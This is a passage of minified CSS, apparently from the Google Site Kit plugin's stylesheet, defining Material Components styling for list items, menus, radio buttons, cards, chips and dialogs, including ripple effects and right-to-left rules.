:not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled):not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item.mdc-ripple-upgraded,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled).mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--activated::before{opacity:.12}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--activated::before,:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--activated::after{background-color:#3c7251}@supports not (-ms-ime-align: auto){:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--activated::before,:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--activated::after{background-color:var(--mdc-theme-primary, #3c7251)}}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--activated:hover::before{opacity:.16}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--activated:not(.mdc-ripple-upgraded):focus::before,:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--activated.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--activated:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--activated:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--activated.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--selected::before{opacity:.08}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--selected::before,:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--selected::after{background-color:#3c7251}@supports not (-ms-ime-align: auto){:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--selected::before,:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--selected::after{background-color:var(--mdc-theme-primary, #3c7251)}}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--selected:hover::before{opacity:.12}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--selected:not(.mdc-ripple-upgraded):focus::before,:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--selected.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.2}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--selected:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--selected:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.2}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item--selected.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.2}:not(.mdc-list--non-interactive)>.mdc-list-item--disabled{--mdc-ripple-fg-size: 0;--mdc-ripple-left: 0;--mdc-ripple-top: 0;--mdc-ripple-fg-scale: 1;--mdc-ripple-fg-translate-end: 0;--mdc-ripple-fg-translate-start: 0;-webkit-tap-highlight-color:rgba(0,0,0,0)}:not(.mdc-list--non-interactive)>.mdc-list-item--disabled::before,:not(.mdc-list--non-interactive)>.mdc-list-item--disabled::after{position:absolute;border-radius:50%;opacity:0;pointer-events:none;content:""}:not(.mdc-list--non-interactive)>.mdc-list-item--disabled::before{transition:opacity 15ms linear,background-color 15ms linear;z-index:1}:not(.mdc-list--non-interactive)>.mdc-list-item--disabled.mdc-ripple-upgraded::before{transform:scale(var(--mdc-ripple-fg-scale, 1))}:not(.mdc-list--non-interactive)>.mdc-list-item--disabled.mdc-ripple-upgraded::after{top:0;left:0;transform:scale(0);transform-origin:center center}:not(.mdc-list--non-interactive)>.mdc-list-item--disabled.mdc-ripple-upgraded--unbounded::after{top:var(--mdc-ripple-top, 0);left:var(--mdc-ripple-left, 0)}:not(.mdc-list--non-interactive)>.mdc-list-item--disabled.mdc-ripple-upgraded--foreground-activation::after{animation:mdc-ripple-fg-radius-in 225ms forwards,mdc-ripple-fg-opacity-in 75ms forwards}:not(.mdc-list--non-interactive)>.mdc-list-item--disabled.mdc-ripple-upgraded--foreground-deactivation::after{animation:mdc-ripple-fg-opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}:not(.mdc-list--non-interactive)>.mdc-list-item--disabled::before,:not(.mdc-list--non-interactive)>.mdc-list-item--disabled::after{top:calc(50% - 100%);left:calc(50% - 100%);width:200%;height:200%}:not(.mdc-list--non-interactive)>.mdc-list-item--disabled.mdc-ripple-upgraded::after{width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}:not(.mdc-list--non-interactive)>.mdc-list-item--disabled::before,:not(.mdc-list--non-interactive)>.mdc-list-item--disabled::after{background-color:#000}:not(.mdc-list--non-interactive)>.mdc-list-item--disabled:not(.mdc-ripple-upgraded):focus::before,:not(.mdc-list--non-interactive)>.mdc-list-item--disabled.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.mdc-menu{min-width:112px}.mdc-menu .mdc-list-item__meta{color:rgba(0,0,0,.87)}.mdc-menu .mdc-list-item__graphic{color:rgba(0,0,0,.87)}.mdc-menu .mdc-list{color:rgba(0,0,0,.87)}.mdc-menu .mdc-list-divider{margin:8px 0}.mdc-menu .mdc-list-item,.mdc-menu .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-menu .googlesitekit-view-only-menu__list-item{-webkit-user-select:none;user-select:none}.mdc-menu .mdc-list-item--disabled{cursor:auto}.mdc-menu a.mdc-list-item .mdc-list-item__text,.mdc-menu .googlesitekit-plugin .googlesitekit-view-only-menu a.googlesitekit-view-only-menu__list-item .mdc-list-item__text,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-menu a.googlesitekit-view-only-menu__list-item .mdc-list-item__text,.mdc-menu a.mdc-list-item .mdc-list-item__graphic,.mdc-menu .googlesitekit-plugin .googlesitekit-view-only-menu a.googlesitekit-view-only-menu__list-item .mdc-list-item__graphic,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-menu a.googlesitekit-view-only-menu__list-item .mdc-list-item__graphic{pointer-events:none}.mdc-menu__selection-group{padding:0;fill:currentColor}.mdc-menu__selection-group .mdc-list-item,.mdc-menu__selection-group .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-menu__selection-group .googlesitekit-view-only-menu__list-item{padding-left:56px;padding-right:16px}[dir=rtl] .mdc-menu__selection-group .mdc-list-item,[dir=rtl] .mdc-menu__selection-group .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu [dir=rtl] .mdc-menu__selection-group .googlesitekit-view-only-menu__list-item,.mdc-menu__selection-group .mdc-list-item[dir=rtl],.mdc-menu__selection-group .googlesitekit-plugin .googlesitekit-view-only-menu [dir=rtl].googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-menu__selection-group [dir=rtl].googlesitekit-view-only-menu__list-item{padding-left:16px;padding-right:56px}.mdc-menu__selection-group .mdc-menu__selection-group-icon{left:16px;right:initial;display:none;position:absolute}[dir=rtl] .mdc-menu__selection-group .mdc-menu__selection-group-icon,.mdc-menu__selection-group .mdc-menu__selection-group-icon[dir=rtl]{left:initial;right:16px}.mdc-menu-item--selected .mdc-menu__selection-group-icon{display:inline}.mdc-menu-surface{display:none;position:absolute;box-sizing:border-box;max-width:calc(100vw - 32px);max-height:calc(100vh - 32px);margin:0;padding:0;transform:scale(1);transform-origin:top left;opacity:0;overflow:auto;will-change:transform,opacity;z-index:8;transition:opacity .03s linear,transform .12s cubic-bezier(0, 0, 0.2, 1);box-shadow:0px 5px 5px -3px rgba(0, 0, 0, 0.2),0px 8px 10px 1px rgba(0, 0, 0, 0.14),0px 3px 14px 2px rgba(0,0,0,.12);background-color:#fff;background-color:var(--mdc-theme-surface, #fff);color:#000;color:var(--mdc-theme-on-surface, #000);border-radius:4px;transform-origin-left:top left;transform-origin-right:top right}.mdc-menu-surface:focus{outline:none}.mdc-menu-surface--open{display:inline-block;transform:scale(1);opacity:1}.mdc-menu-surface--animating-open{display:inline-block;transform:scale(0.8);opacity:0}.mdc-menu-surface--animating-closed{display:inline-block;opacity:0;transition:opacity .075s linear}[dir=rtl] .mdc-menu-surface,.mdc-menu-surface[dir=rtl]{transform-origin-left:top right;transform-origin-right:top left}.mdc-menu-surface--anchor{position:relative;overflow:visible}.mdc-menu-surface--fixed{position:fixed}.mdc-radio{display:inline-block;position:relative;flex:0 0 auto;box-sizing:border-box;width:40px;height:40px;padding:10px;cursor:pointer;will-change:opacity,transform,border-color,color}.mdc-radio .mdc-radio__native-control:enabled:not(:checked)+.mdc-radio__background .mdc-radio__outer-circle{border-color:rgba(0,0,0,.54)}.mdc-radio .mdc-radio__native-control:enabled:checked+.mdc-radio__background .mdc-radio__outer-circle{border-color:#446199;border-color:var(--mdc-theme-secondary, #446199)}.mdc-radio .mdc-radio__native-control:enabled+.mdc-radio__background .mdc-radio__inner-circle{border-color:#446199;border-color:var(--mdc-theme-secondary, #446199)}.mdc-radio .mdc-radio__background::before{background-color:#446199}@supports not (-ms-ime-align: auto){.mdc-radio .mdc-radio__background::before{background-color:var(--mdc-theme-secondary, #446199)}}.mdc-radio__background{display:inline-block;position:absolute;left:10px;box-sizing:border-box;width:50%;height:50%}.mdc-radio__background::before{position:absolute;top:0;left:0;width:100%;height:100%;transform:scale(0, 0);border-radius:50%;opacity:0;pointer-events:none;content:"";transition:opacity 120ms 0ms cubic-bezier(0.4, 0, 0.6, 1),transform 120ms 0ms cubic-bezier(0.4, 0, 0.6, 1)}.mdc-radio__outer-circle{position:absolute;top:0;left:0;box-sizing:border-box;width:100%;height:100%;border-width:2px;border-style:solid;border-radius:50%;transition:border-color 120ms 0ms cubic-bezier(0.4, 0, 0.6, 1)}.mdc-radio__inner-circle{position:absolute;top:0;left:0;box-sizing:border-box;width:100%;height:100%;transform:scale(0, 0);border-width:10px;border-style:solid;border-radius:50%;transition:transform 120ms 0ms cubic-bezier(0.4, 0, 0.6, 1),border-color 120ms 0ms cubic-bezier(0.4, 0, 0.6, 1)}.mdc-radio__native-control{position:absolute;top:0;left:0;width:100%;height:100%;margin:0;padding:0;opacity:0;cursor:inherit;z-index:1}.mdc-radio__native-control:checked+.mdc-radio__background,.mdc-radio__native-control:disabled+.mdc-radio__background{transition:opacity 120ms 0ms cubic-bezier(0, 0, 0.2, 1),transform 120ms 0ms cubic-bezier(0, 0, 0.2, 1)}.mdc-radio__native-control:checked+.mdc-radio__background .mdc-radio__outer-circle,.mdc-radio__native-control:disabled+.mdc-radio__background .mdc-radio__outer-circle{transition:border-color 120ms 0ms cubic-bezier(0, 0, 0.2, 1)}.mdc-radio__native-control:checked+.mdc-radio__background .mdc-radio__inner-circle,.mdc-radio__native-control:disabled+.mdc-radio__background .mdc-radio__inner-circle{transition:transform 120ms 0ms cubic-bezier(0, 0, 0.2, 1),border-color 120ms 0ms cubic-bezier(0, 0, 0.2, 1)}.mdc-radio--disabled{cursor:default;pointer-events:none}.mdc-radio__native-control:checked+.mdc-radio__background .mdc-radio__inner-circle{transform:scale(0.5);transition:transform 120ms 0ms cubic-bezier(0, 0, 0.2, 1),border-color 120ms 0ms cubic-bezier(0, 0, 0.2, 1)}.mdc-radio__native-control:disabled+.mdc-radio__background,[aria-disabled=true] .mdc-radio__native-control+.mdc-radio__background{cursor:default}.mdc-radio__native-control:disabled+.mdc-radio__background .mdc-radio__outer-circle,[aria-disabled=true] .mdc-radio__native-control+.mdc-radio__background .mdc-radio__outer-circle{border-color:rgba(0,0,0,.26)}.mdc-radio__native-control:disabled+.mdc-radio__background .mdc-radio__inner-circle,[aria-disabled=true] .mdc-radio__native-control+.mdc-radio__background .mdc-radio__inner-circle{border-color:rgba(0,0,0,.26)}.mdc-radio__native-control:focus+.mdc-radio__background::before{transform:scale(2, 2);opacity:.12;transition:opacity 120ms 0ms cubic-bezier(0, 0, 0.2, 1),transform 120ms 0ms cubic-bezier(0, 0, 0.2, 1)}.mdc-radio{--mdc-ripple-fg-size: 0;--mdc-ripple-left: 0;--mdc-ripple-top: 0;--mdc-ripple-fg-scale: 1;--mdc-ripple-fg-translate-end: 0;--mdc-ripple-fg-translate-start: 0;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mdc-radio::before,.mdc-radio::after{position:absolute;border-radius:50%;opacity:0;pointer-events:none;content:""}.mdc-radio::before{transition:opacity 15ms linear,background-color 15ms linear;z-index:1}.mdc-radio.mdc-ripple-upgraded::before{transform:scale(var(--mdc-ripple-fg-scale, 1))}.mdc-radio.mdc-ripple-upgraded::after{top:0;left:0;transform:scale(0);transform-origin:center center}.mdc-radio.mdc-ripple-upgraded--unbounded::after{top:var(--mdc-ripple-top, 0);left:var(--mdc-ripple-left, 0)}.mdc-radio.mdc-ripple-upgraded--foreground-activation::after{animation:mdc-ripple-fg-radius-in 225ms forwards,mdc-ripple-fg-opacity-in 75ms forwards}.mdc-radio.mdc-ripple-upgraded--foreground-deactivation::after{animation:mdc-ripple-fg-opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}.mdc-radio::before,.mdc-radio::after{top:calc(50% - 50%);left:calc(50% - 50%);width:100%;height:100%}.mdc-radio.mdc-ripple-upgraded::before,.mdc-radio.mdc-ripple-upgraded::after{top:var(--mdc-ripple-top, calc(50% - 50%));left:var(--mdc-ripple-left, calc(50% - 50%));width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-radio.mdc-ripple-upgraded::after{width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-radio::before,.mdc-radio::after{background-color:#446199}@supports not (-ms-ime-align: auto){.mdc-radio::before,.mdc-radio::after{background-color:var(--mdc-theme-secondary, #446199)}}.mdc-radio:hover::before{opacity:.04}.mdc-radio:not(.mdc-ripple-upgraded):focus::before,.mdc-radio.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.mdc-radio:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-radio:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.mdc-radio.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.mdc-radio.mdc-ripple-upgraded--background-focused .mdc-radio__background::before{content:none}.mdc-card{border-radius:4px;background-color:#fff;background-color:var(--mdc-theme-surface, #fff);box-shadow:0px 2px 1px -1px rgba(0, 0, 0, 0.2),0px 1px 1px 0px rgba(0, 0, 0, 0.14),0px 1px 3px 0px rgba(0,0,0,.12);display:flex;flex-direction:column;box-sizing:border-box}.mdc-card--outlined{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0.2),0px 0px 0px 0px rgba(0, 0, 0, 0.14),0px 0px 0px 0px rgba(0,0,0,.12);border-width:1px;border-style:solid;border-color:#e0e0e0}.mdc-card__media{position:relative;box-sizing:border-box;background-repeat:no-repeat;background-position:center;background-size:cover}.mdc-card__media::before{display:block;content:""}.mdc-card__media:first-child{border-top-left-radius:inherit;border-top-right-radius:inherit}.mdc-card__media:last-child{border-bottom-left-radius:inherit;border-bottom-right-radius:inherit}.mdc-card__media--square::before{margin-top:100%}.mdc-card__media--16-9::before{margin-top:56.25%}.mdc-card__media-content{position:absolute;top:0;right:0;bottom:0;left:0;box-sizing:border-box}.mdc-card__primary-action{display:flex;flex-direction:column;box-sizing:border-box;position:relative;outline:none;color:inherit;-webkit-text-decoration:none;text-decoration:none;cursor:pointer;overflow:hidden}.mdc-card__primary-action:first-child{border-top-left-radius:inherit;border-top-right-radius:inherit}.mdc-card__primary-action:last-child{border-bottom-left-radius:inherit;border-bottom-right-radius:inherit}.mdc-card__actions{display:flex;flex-direction:row;align-items:center;box-sizing:border-box;min-height:52px;padding:8px}.mdc-card__actions--full-bleed{padding:0}.mdc-card__action-buttons,.mdc-card__action-icons{display:flex;flex-direction:row;align-items:center;box-sizing:border-box}.mdc-card__action-icons{color:rgba(0,0,0,.6);flex-grow:1;justify-content:flex-end}.mdc-card__action-buttons+.mdc-card__action-icons{margin-left:16px;margin-right:0}[dir=rtl] .mdc-card__action-buttons+.mdc-card__action-icons,.mdc-card__action-buttons+.mdc-card__action-icons[dir=rtl]{margin-left:0;margin-right:16px}.mdc-card__action{display:inline-flex;flex-direction:row;align-items:center;box-sizing:border-box;justify-content:center;cursor:pointer;-webkit-user-select:none;user-select:none}.mdc-card__action:focus{outline:none}.mdc-card__action--button{margin-left:0;margin-right:8px;padding:0 8px}[dir=rtl] .mdc-card__action--button,.mdc-card__action--button[dir=rtl]{margin-left:8px;margin-right:0}.mdc-card__action--button:last-child{margin-left:0;margin-right:0}[dir=rtl] .mdc-card__action--button:last-child,.mdc-card__action--button:last-child[dir=rtl]{margin-left:0;margin-right:0}.mdc-card__actions--full-bleed .mdc-card__action--button{justify-content:space-between;width:100%;height:auto;max-height:none;margin:0;padding:8px 16px;text-align:left}[dir=rtl] .mdc-card__actions--full-bleed .mdc-card__action--button,.mdc-card__actions--full-bleed .mdc-card__action--button[dir=rtl]{text-align:right}.mdc-card__action--icon{margin:-6px 0;padding:12px}.mdc-card__action--icon:not(:disabled){color:rgba(0,0,0,.6)}.mdc-card__primary-action{--mdc-ripple-fg-size: 0;--mdc-ripple-left: 0;--mdc-ripple-top: 0;--mdc-ripple-fg-scale: 1;--mdc-ripple-fg-translate-end: 0;--mdc-ripple-fg-translate-start: 0;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mdc-card__primary-action::before,.mdc-card__primary-action::after{position:absolute;border-radius:50%;opacity:0;pointer-events:none;content:""}.mdc-card__primary-action::before{transition:opacity 15ms linear,background-color 15ms linear;z-index:1}.mdc-card__primary-action.mdc-ripple-upgraded::before{transform:scale(var(--mdc-ripple-fg-scale, 1))}.mdc-card__primary-action.mdc-ripple-upgraded::after{top:0;left:0;transform:scale(0);transform-origin:center center}.mdc-card__primary-action.mdc-ripple-upgraded--unbounded::after{top:var(--mdc-ripple-top, 0);left:var(--mdc-ripple-left, 0)}.mdc-card__primary-action.mdc-ripple-upgraded--foreground-activation::after{animation:mdc-ripple-fg-radius-in 225ms forwards,mdc-ripple-fg-opacity-in 75ms forwards}.mdc-card__primary-action.mdc-ripple-upgraded--foreground-deactivation::after{animation:mdc-ripple-fg-opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}.mdc-card__primary-action::before,.mdc-card__primary-action::after{top:calc(50% - 100%);left:calc(50% - 100%);width:200%;height:200%}.mdc-card__primary-action.mdc-ripple-upgraded::after{width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-card__primary-action::before,.mdc-card__primary-action::after{background-color:#000}.mdc-card__primary-action:hover::before{opacity:.04}.mdc-card__primary-action:not(.mdc-ripple-upgraded):focus::before,.mdc-card__primary-action.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.mdc-card__primary-action:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-card__primary-action:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.mdc-card__primary-action.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.mdc-chip__icon--leading{color:rgba(0,0,0,.54)}.mdc-chip__icon--trailing{color:rgba(0,0,0,.54)}.mdc-chip__icon--trailing:hover{color:rgba(0,0,0,.62)}.mdc-chip__icon--trailing:focus{color:rgba(0,0,0,.87)}.mdc-chip__icon.mdc-chip__icon--leading:not(.mdc-chip__icon--leading-hidden){width:20px;height:20px;font-size:20px}.mdc-chip__icon.mdc-chip__icon--trailing{width:18px;height:18px;font-size:18px}.mdc-chip__icon--trailing{margin:0 -4px 0 4px}.mdc-chip{border-radius:16px;background-color:#e0e0e0;color:rgba(0,0,0,.87);font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:.875rem;line-height:1.25rem;font-weight:400;letter-spacing:.0178571429em;text-decoration:inherit;text-transform:inherit;height:32px;display:inline-flex;position:relative;align-items:center;box-sizing:border-box;padding:7px 12px;outline:none;cursor:pointer;overflow:hidden}.mdc-chip:hover{color:rgba(0,0,0,.87)}.mdc-chip.mdc-chip--selected .mdc-chip__checkmark,.mdc-chip .mdc-chip__icon--leading:not(.mdc-chip__icon--leading-hidden){margin-left:-4px;margin-right:4px;margin-top:-4px;margin-bottom:-4px}[dir=rtl] .mdc-chip.mdc-chip--selected .mdc-chip__checkmark,.mdc-chip.mdc-chip--selected .mdc-chip__checkmark[dir=rtl],[dir=rtl] .mdc-chip .mdc-chip__icon--leading:not(.mdc-chip__icon--leading-hidden),.mdc-chip .mdc-chip__icon--leading:not(.mdc-chip__icon--leading-hidden)[dir=rtl]{margin-left:4px;margin-right:-4px}.mdc-chip:hover{color:#000;color:var(--mdc-theme-on-surface, #000)}.mdc-chip--exit{transition:opacity 75ms cubic-bezier(0.4, 0, 0.2, 1),width 150ms cubic-bezier(0, 0, 0.2, 1),padding 100ms linear,margin 100ms linear;opacity:0}.mdc-chip__text{white-space:nowrap}.mdc-chip__icon{border-radius:50%;outline:none;vertical-align:middle}.mdc-chip__checkmark{height:20px}.mdc-chip__checkmark-path{transition:stroke-dashoffset 150ms 50ms cubic-bezier(0.4, 0, 0.6, 1);stroke-width:2px;stroke-dashoffset:29.7833385;stroke-dasharray:29.7833385}.mdc-chip--selected .mdc-chip__checkmark-path{stroke-dashoffset:0}.mdc-chip-set--choice .mdc-chip.mdc-chip--selected{color:#3c7251;color:var(--mdc-theme-primary, #3c7251)}.mdc-chip-set--choice .mdc-chip.mdc-chip--selected .mdc-chip__icon--leading{color:rgba(60,114,81,.54)}.mdc-chip-set--choice .mdc-chip.mdc-chip--selected:hover{color:#3c7251;color:var(--mdc-theme-primary, #3c7251)}.mdc-chip-set--choice .mdc-chip .mdc-chip__checkmark-path{stroke:#3c7251;stroke:var(--mdc-theme-primary, #3c7251)}.mdc-chip-set--choice .mdc-chip--selected{background-color:#fff;background-color:var(--mdc-theme-surface, #fff)}.mdc-chip__checkmark-svg{width:0;height:20px;transition:width 150ms cubic-bezier(0.4, 0, 0.2, 1)}.mdc-chip--selected .mdc-chip__checkmark-svg{width:20px}.mdc-chip-set--filter .mdc-chip__icon--leading{transition:opacity 75ms linear;transition-delay:-50ms;opacity:1}.mdc-chip-set--filter .mdc-chip__icon--leading+.mdc-chip__checkmark{transition:opacity 75ms linear;transition-delay:80ms;opacity:0}.mdc-chip-set--filter .mdc-chip__icon--leading+.mdc-chip__checkmark .mdc-chip__checkmark-svg{transition:width 0ms}.mdc-chip-set--filter .mdc-chip--selected .mdc-chip__icon--leading{opacity:0}.mdc-chip-set--filter .mdc-chip--selected .mdc-chip__icon--leading+.mdc-chip__checkmark{width:0;opacity:1}.mdc-chip-set--filter .mdc-chip__icon--leading-hidden.mdc-chip__icon--leading{width:0;opacity:0}.mdc-chip-set--filter .mdc-chip__icon--leading-hidden.mdc-chip__icon--leading+.mdc-chip__checkmark{width:20px}.mdc-chip{--mdc-ripple-fg-size: 0;--mdc-ripple-left: 0;--mdc-ripple-top: 0;--mdc-ripple-fg-scale: 1;--mdc-ripple-fg-translate-end: 0;--mdc-ripple-fg-translate-start: 0;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mdc-chip::before,.mdc-chip::after{position:absolute;border-radius:50%;opacity:0;pointer-events:none;content:""}.mdc-chip::before{transition:opacity 15ms linear,background-color 15ms linear;z-index:1}.mdc-chip.mdc-ripple-upgraded::before{transform:scale(var(--mdc-ripple-fg-scale, 1))}.mdc-chip.mdc-ripple-upgraded::after{top:0;left:0;transform:scale(0);transform-origin:center center}.mdc-chip.mdc-ripple-upgraded--unbounded::after{top:var(--mdc-ripple-top, 0);left:var(--mdc-ripple-left, 0)}.mdc-chip.mdc-ripple-upgraded--foreground-activation::after{animation:mdc-ripple-fg-radius-in 225ms forwards,mdc-ripple-fg-opacity-in 75ms forwards}.mdc-chip.mdc-ripple-upgraded--foreground-deactivation::after{animation:mdc-ripple-fg-opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}.mdc-chip::before,.mdc-chip::after{top:calc(50% - 100%);left:calc(50% - 100%);width:200%;height:200%}.mdc-chip.mdc-ripple-upgraded::after{width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-chip::before,.mdc-chip::after{background-color:rgba(0,0,0,.87)}.mdc-chip:hover::before{opacity:.04}.mdc-chip:not(.mdc-ripple-upgraded):focus::before,.mdc-chip.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.mdc-chip:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-chip:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.mdc-chip.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.mdc-chip-set--choice .mdc-chip.mdc-chip--selected::before{opacity:.08}.mdc-chip-set--choice .mdc-chip.mdc-chip--selected::before,.mdc-chip-set--choice .mdc-chip.mdc-chip--selected::after{background-color:#3c7251}@supports not (-ms-ime-align: auto){.mdc-chip-set--choice .mdc-chip.mdc-chip--selected::before,.mdc-chip-set--choice .mdc-chip.mdc-chip--selected::after{background-color:var(--mdc-theme-primary, #3c7251)}}.mdc-chip-set--choice .mdc-chip.mdc-chip--selected:hover::before{opacity:.12}.mdc-chip-set--choice .mdc-chip.mdc-chip--selected:not(.mdc-ripple-upgraded):focus::before,.mdc-chip-set--choice .mdc-chip.mdc-chip--selected.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.2}.mdc-chip-set--choice .mdc-chip.mdc-chip--selected:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-chip-set--choice .mdc-chip.mdc-chip--selected:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.2}.mdc-chip-set--choice .mdc-chip.mdc-chip--selected.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.2}@keyframes mdc-chip-entry{from{transform:scale(0.8);opacity:.4}to{transform:scale(1);opacity:1}}.mdc-chip-set{padding:4px;display:flex;flex-wrap:wrap;box-sizing:border-box}.mdc-chip-set .mdc-chip{margin:4px}.mdc-chip-set--input .mdc-chip{animation:mdc-chip-entry 100ms cubic-bezier(0, 0, 0.2, 1)}.mdc-dialog,.mdc-dialog__scrim{position:fixed;top:0;left:0;align-items:center;justify-content:center;box-sizing:border-box;width:100%;height:100%}.mdc-dialog{display:none;z-index:7}.mdc-dialog .mdc-dialog__surface{background-color:#fff;background-color:var(--mdc-theme-surface, #fff)}.mdc-dialog .mdc-dialog__scrim{background-color:rgba(0,0,0,.32)}.mdc-dialog .mdc-dialog__title{color:rgba(0,0,0,.87)}.mdc-dialog .mdc-dialog__content{color:rgba(0,0,0,.6)}.mdc-dialog.mdc-dialog--scrollable .mdc-dialog__title,.mdc-dialog.mdc-dialog--scrollable .mdc-dialog__actions{border-color:rgba(0,0,0,.12)}.mdc-dialog .mdc-dialog__surface{min-width:280px}@media(max-width: 592px){.mdc-dialog .mdc-dialog__surface{max-width:calc(100vw - 32px)}}@media(min-width: 592px){.mdc-dialog .mdc-dialog__surface{max-width:560px}}.mdc-dialog .mdc-dialog__surface{max-height:calc(100vh - 32px)}.mdc-dialog .mdc-dialog__surface{border-radius:4px}.mdc-dialog__scrim{opacity:0;z-index:-1}.mdc-dialog__container{display:flex;flex-direction:row;justify-content:space-around;box-sizing:border-box;transform:scale(0.8);opacity:0}.mdc-dialog__surface{box-shadow:0px 11px 15px -7px rgba(0, 0, 0, 0.2),0px 24px 38px 3px rgba(0, 0, 0, 0.14),0px 9px 46px 8px rgba(0,0,0,.12);display:flex;flex-direction:column;flex-grow:0;flex-shrink:0;box-sizing:border-box;max-width:100%;max-height:100%}.mdc-dialog[dir=rtl] .mdc-dialog__surface,[dir=rtl] .mdc-dialog .mdc-dialog__surface{text-align:right}.mdc-dialog__title{display:block;margin-top:0;line-height:normal;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:1.25rem;line-height:2rem;font-weight:500;letter-spacing:.0125em;text-decoration:inherit;text-transform:inherit;display:block;position:relative;flex-shrink:0;box-sizing:border-box;margin:0;padding:0 24px 9px;border-bottom:1px solid transparent}.mdc-dialog__title::before{display:inline-block;width:0;height:40px;content:"";vertical-align:0}.mdc-dialog[dir=rtl] .mdc-dialog__title,[dir=rtl] .mdc-dialog 